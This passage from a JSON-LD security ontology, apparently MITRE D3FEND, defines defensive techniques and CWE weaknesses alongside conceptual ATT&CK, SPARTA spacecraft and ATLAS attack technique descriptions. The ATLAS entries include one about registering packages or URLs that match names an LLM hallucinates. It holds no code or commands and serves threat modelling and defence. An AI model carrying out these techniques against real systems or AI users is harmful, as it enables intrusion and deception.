        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:HeapSegment",
      "@type": "owl:Class",
      "d3f:definition": "The heap segment (or free store) is a large pool of memory from which dynamic memory requests of a process are allocated and satisfied.",
      "rdfs:label": "Heap Segment",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Memory_management#HEAP"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:LM-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0007",
      "d3f:definition": "Movement is achieved by reusing legitimate credentials and keys to cross boundaries that rely on trust rather than strict isolation. Using operator or service accounts, maintenance logins, station certificates, or spacecraft-recognized crypto, the adversary invokes gateways that bridge domains, C&DH to payload, crosslink routers to onboard networks, or constellation management planes to individual vehicles. Because the traversal occurs through approved interfaces (file services, table loaders, remote procedure calls, crosslink tasking), actions appear as routine operations while reaching progressively more privileged subsystems or neighboring spacecraft. Where roles and scopes are broad or reused, the same credential opens multiple enclaves, turning authorization itself into the lateral path.",
      "rdfs:label": "Credentialed Traversal - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Credentialed Traversal"
    },
    {
      "@id": "d3f:LinuxVfork",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process and temporarily suspends the parent process until the child terminates.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/vfork.2.html"
      },
      "rdfs:label": "Linux Vfork",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:SPARTAInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0003"
      },
      "rdfs:label": "Initial Access Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N870f88b13b08432eb88cf51426eb8e8a"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:N870f88b13b08432eb88cf51426eb8e8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0003"
      }
    },
    {
      "@id": "d3f:T1420",
      "@type": "owl:Class",
      "d3f:attack-id": "T1420",
      "d3f:definition": "Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions.",
      "rdfs:label": "File and Directory Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "File and Directory Discovery"
    },
    {
      "@id": "d3f:OSAPIReadMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that reads the contents of memory from a specific address or region.",
      "d3f:invokes": {
        "@id": "d3f:ReadMemory"
      },
      "rdfs:label": "OS API Read Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7366e6d18bf54732ac121238a30d7ff0"
        }
      ]
    },
    {
      "@id": "_:N7366e6d18bf54732ac121238a30d7ff0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadMemory"
      }
    },
    {
      "@id": "d3f:TA0030",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Defense Evasion - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:OTPowerSupply",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT power supply is a power supply whose control amplifier is optimized for signal-processing tasks rather than supplying mere steady-state power to a load. It is a self-contained combination of operational amplifiers, power amplifiers, and integral power circuits designed for higher-level operations in industrial or OT contexts.",
      "rdfs:label": "OT Power Supply",
      "rdfs:seeAlso": {
        "@id": "https://ieeexplore.ieee.org/servlet/opac?punumber=4116785"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PowerSupply"
      },
      "skos:example": "Phoenix Contact QUINT, Eaton PSG, and many controller-branded power supplies."
    },
    {
      "@id": "d3f:ElectronicCombinationLockEvent",
      "@type": "owl:Class",
      "rdfs:comment": "An event occurring when a combination lock's bolt changes position.",
      "rdfs:label": "Electronic Combination Lock Event",
      "rdfs:seeAlso": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:Nb92fc156928c423fb87b1569baa93eac"
        }
      ]
    },
    {
      "@id": "_:Nb92fc156928c423fb87b1569baa93eac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:LocalAreaNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A local area network (LAN) is a computer network that interconnects computers within a limited area such as a residence, school, laboratory, university campus or office building and has its network equipment and interconnects locally managed. Ethernet and Wi-Fi are the two most common transmission technologies in use for local area networks. Historical technologies include ARCNET, Token ring, and AppleTalk.",
      "d3f:may-contain": {
        "@id": "d3f:Host"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Local_area_network"
      },
      "rdfs:label": "Local Area Network",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Network"
        },
        {
          "@id": "_:Ndc0bda103c8d49b7835c69a8ee3fa62e"
        }
      ],
      "skos:altLabel": "LAN"
    },
    {
      "@id": "_:Ndc0bda103c8d49b7835c69a8ee3fa62e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1090.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.001",
      "d3f:definition": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Internal Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:Nd1b7dd6bc31a4562bdabffc80564fe3c"
        }
      ]
    },
    {
      "@id": "_:Nd1b7dd6bc31a4562bdabffc80564fe3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:FileUnmountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file system or storage volume is unmounted, disconnecting its files and directories from the operating system or applications.",
      "rdfs:label": "File Unmount Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N0cf0301c1c744c14b961b9be3b3e15a4"
        }
      ]
    },
    {
      "@id": "_:N0cf0301c1c744c14b961b9be3b3e15a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMountEvent"
      }
    },
    {
      "@id": "d3f:CWE-274",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-274",
      "d3f:definition": "The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.",
      "rdfs:label": "Improper Handling of Insufficient Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-269"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-295",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-295",
      "d3f:definition": "The product does not validate, or incorrectly validates, a certificate.",
      "rdfs:label": "Improper Certificate Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:T1048.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.003",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Unencrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:Nfb4998313f0a4fdebd1fa36e1c8f657c"
        }
      ]
    },
    {
      "@id": "_:Nfb4998313f0a4fdebd1fa36e1c8f657c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:uses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x uses y: The entity x puts into service a resource or implement y; makes y work or employs y for a particular purpose or for its inherent or natural purpose.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01161188-v"
      },
      "rdfs:label": "uses",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:FileFormatVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileFormatVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileSection"
      },
      "d3f:d3fend-id": "D3-FFV",
      "d3f:definition": "Verifying that a file conforms to its expected format specifications.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc"
      },
      "rdfs:label": "File Format Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentValidation"
        },
        {
          "@id": "_:Nf55f0d2f932c46e7a2367eca804e355c"
        }
      ]
    },
    {
      "@id": "_:Nf55f0d2f932c46e7a2367eca804e355c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:CWE-940",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-940",
      "d3f:definition": "The product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.",
      "rdfs:label": "Improper Verification of Source of a Communication Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-346"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0001",
      "d3f:definition": "Much like the [Search Open Technical Databases](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common AI models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.\nThis will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial AI Attacks](/techniques/AML.T0017.000) if necessary.",
      "rdfs:label": "Search Open AI Vulnerability Analysis - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open AI Vulnerability Analysis"
    },
    {
      "@id": "d3f:CCI-001454_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization ensures that remote sessions for accessing an organization-defined list of security functions and security-relevant information are audited.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001454"
    },
    {
      "@id": "d3f:CWE-480",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-480",
      "d3f:definition": "The product accidentally uses the wrong operator, which changes the logic in security-relevant ways.",
      "rdfs:label": "Use of Incorrect Operator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:ATTACKICSTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSThing"
      }
    },
    {
      "@id": "d3f:input-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x input-of y: An artifact x is input of an event y iff x participates at the start of y, provides the material or information required for y to begin, and during y either x's state is altered or the information content it bears is realized.",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "input-of",
      "rdfs:range": {
        "@id": "d3f:Event"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.commoncoreontologies.org/ont00001841"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:participates-in"
      }
    },
    {
      "@id": "d3f:OTNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "d3f:definition": "A computer network which connects OT devices.",
      "d3f:may-contain": {
        "@id": "d3f:OTEngineeringWorkstation"
      },
      "rdfs:label": "OT Network",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetwork"
        },
        {
          "@id": "_:N78d42ad974854e23ac571bc36c3b87c2"
        },
        {
          "@id": "_:N43a4c93cde604307ac394aeed8f36ce5"
        }
      ]
    },
    {
      "@id": "_:N78d42ad974854e23ac571bc36c3b87c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "_:N43a4c93cde604307ac394aeed8f36ce5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEngineeringWorkstation"
      }
    },
    {
      "@id": "d3f:WindowsVirtualAllocEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtAllocateVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex"
      },
      "rdfs:label": "Windows VirtualAllocEx",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIAllocateMemory"
        },
        {
          "@id": "_:N9f4c077bfce64ffa89adbbff6cdbb11f"
        },
        {
          "@id": "_:N73363a9994d546cf81026f10388fa181"
        }
      ]
    },
    {
      "@id": "_:N9f4c077bfce64ffa89adbbff6cdbb11f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtAllocateVirtualMemory"
      }
    },
    {
      "@id": "_:N73363a9994d546cf81026f10388fa181",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "d3f:Reference-ExecutionWithAT_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-004/"
      },
      "d3f:kb-abstract": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows built-in command AT (at.exe) to schedule a command to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally. The built-in Windows tool schtasks.exe (CAR-2013-08-001) offers greater flexibility when creating, modifying, and enumerating tasks. For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-004: Execution with AT",
      "rdfs:label": "Reference - CAR-2013-05-004: Execution with AT - MITRE"
    },
    {
      "@id": "d3f:Reference-IdentifyingADenial-of-serviceAttackInACloud-basedProxyService-CloudfareInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8613089B1"
      },
      "d3f:kb-abstract": "A cloud-based proxy service identifies a denial-of-service (DoS) attack including determining that there is a potential DoS attack being directed to an IP address of the cloud-based proxy service; and responsive to determining that there are a plurality of domains that resolve to that IP address, identifying the one of the plurality of domains that is the target of the DoS attack. The domain that is under attack is identified by scattering the plurality of domains to resolve to different IP addresses, where a result of the scattering is that each of those domains resolves to a different IP address, and identifying one of those plurality of domains as the target of the DoS attack by determining that there is an abnormally high amount of traffic being directed to the IP address in which that domain resolves.",
      "d3f:kb-author": "Lee Hahn Holloway, Srikanth N. Rao, Matthew Browning Prince, Matthieu Philippe Francois Tourne, Ian Gerald Pye, Ray Raymond Bejjani, Terry Paul Rodery, Jr.",
      "d3f:kb-organization": "Cloudflare Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Identifying a denial-of-service attack in a cloud-based proxy service",
      "rdfs:label": "Reference - Identifying a denial-of-service attack in a cloud-based proxy service - Cloudflare Inc."
    },
    {
      "@id": "d3f:EmulatedFileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmulatedFileAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "d3f:ExecutableFile"
        }
      ],
      "d3f:d3fend-id": "D3-EFA",
      "d3f:definition": "Emulating instructions in a file looking for specific patterns.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation"
      },
      "rdfs:label": "Emulated File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "_:Nedf014a766694d97878852992b703b6c"
        },
        {
          "@id": "_:N80960cb70fef4d0e872f79665d7d8366"
        }
      ]
    },
    {
      "@id": "_:Nedf014a766694d97878852992b703b6c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "_:N80960cb70fef4d0e872f79665d7d8366",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1552.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:GroupPolicy"
      },
      "d3f:attack-id": "T1552.006",
      "d3f:definition": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)",
      "rdfs:label": "Group Policy Preferences",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:Na07d7ed1a2d64723aa32cc73e3ab2aec"
        }
      ]
    },
    {
      "@id": "_:Na07d7ed1a2d64723aa32cc73e3ab2aec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:CWE-194",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-194",
      "d3f:definition": "The product performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses.",
      "rdfs:label": "Unexpected Sign Extension",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:depends-on",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x depends-on y: The entity x is contingent on y being available; x relies on y.",
      "owl:inverseOf": {
        "@id": "d3f:has-dependent"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00729216-a"
      },
      "rdfs:label": "depends-on",
      "rdfs:seeAlso": {
        "@id": "https://www.cisa.gov/what-are-dependencies"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DHCPInformEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends an INFORM message to request configuration parameters, such as DNS or gateway information, without requiring IP address assignment.",
      "rdfs:label": "DHCP Inform Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DHCPEvent"
      },
      "skos:altLabel": "DHCPINFORM"
    },
    {
      "@id": "d3f:CCI-002263_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002263"
    },
    {
      "@id": "d3f:T1055.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.012",
      "d3f:definition": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:modifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Process Hollowing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N991efc064c3a49a2bd959fa2ec6f0382"
        }
      ]
    },
    {
      "@id": "_:N991efc064c3a49a2bd959fa2ec6f0382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1542.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.005",
      "d3f:creates": {
        "@id": "d3f:TFTPNetworkTraffic"
      },
      "d3f:definition": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.",
      "rdfs:label": "TFTP Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Nf8b3753143764a71813baee98d90843d"
        }
      ]
    },
    {
      "@id": "_:Nf8b3753143764a71813baee98d90843d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TFTPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCBFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCB File"
    },
    {
      "@id": "d3f:CWE-119",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-119",
      "d3f:definition": "The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.",
      "d3f:synonym": [
        "Buffer Overflow",
        "buffer overrun",
        "memory safety"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-118"
        },
        {
          "@id": "_:Nbc14717f515947f990e1520c3c9d2243"
        }
      ]
    },
    {
      "@id": "_:Nbc14717f515947f990e1520c3c9d2243",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:EXF-0006.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EXF-0006.02",
      "d3f:definition": "On bent-pipe or regenerative transponders, configuration controls what is translated, amplified, and routed. An adversary can remap input–output paths, shift translation frequencies, adjust polarization or gain to favor non-mission receivers, or enable auxiliary ports so selected virtual channels or recorder playbacks are forwarded outside the planned ground segment. In regenerative systems, edited routing tables or QoS rules can mirror traffic to an attacker-controlled endpoint. The result is a sanctioned-looking carrier that quietly delivers mission data to unauthorized listeners.",
      "d3f:modifies": {
        "@id": "d3f:SatelliteTransponder"
      },
      "rdfs:label": "Transponder - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EXF-0006"
        },
        {
          "@id": "_:Ne106d513865a44b4922612cb48518d98"
        }
      ],
      "skos:prefLabel": "Transponder"
    },
    {
      "@id": "_:Ne106d513865a44b4922612cb48518d98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SatelliteTransponder"
      }
    },
    {
      "@id": "d3f:OTTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read, set, or calculate timing mechanisms.",
      "rdfs:comment": [
        "BACnet: timeSynchronization\nBACnet: utcTimeSynchronization ",
        "GE-SRTP: SET PLC TIME/DATE\nGE-SRTP: RETURN PLC TIME/DATE"
      ],
      "rdfs:label": "OT Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:T1176.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1176.002",
      "d3f:definition": "Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace)",
      "rdfs:label": "IDE Extensions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1176"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-003/"
      },
      "d3f:kb-abstract": "This search looks for flags passed to bcdedit.exe that modify the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-003: BCDEdit Failure Recovery Modification",
      "rdfs:label": "Reference - CAR-2021-05-003: BCDEdit Failure Recovery Modification - MITRE"
    },
    {
      "@id": "d3f:AML.T0060",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0060",
      "d3f:definition": "Adversaries may create an entity they control, such as a software package, website, or email address, corresponding to a source hallucinated by an LLM. The hallucinations may take the form of package names, commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed.",
      "rdfs:label": "Publish Hallucinated Entities - ATLAS",
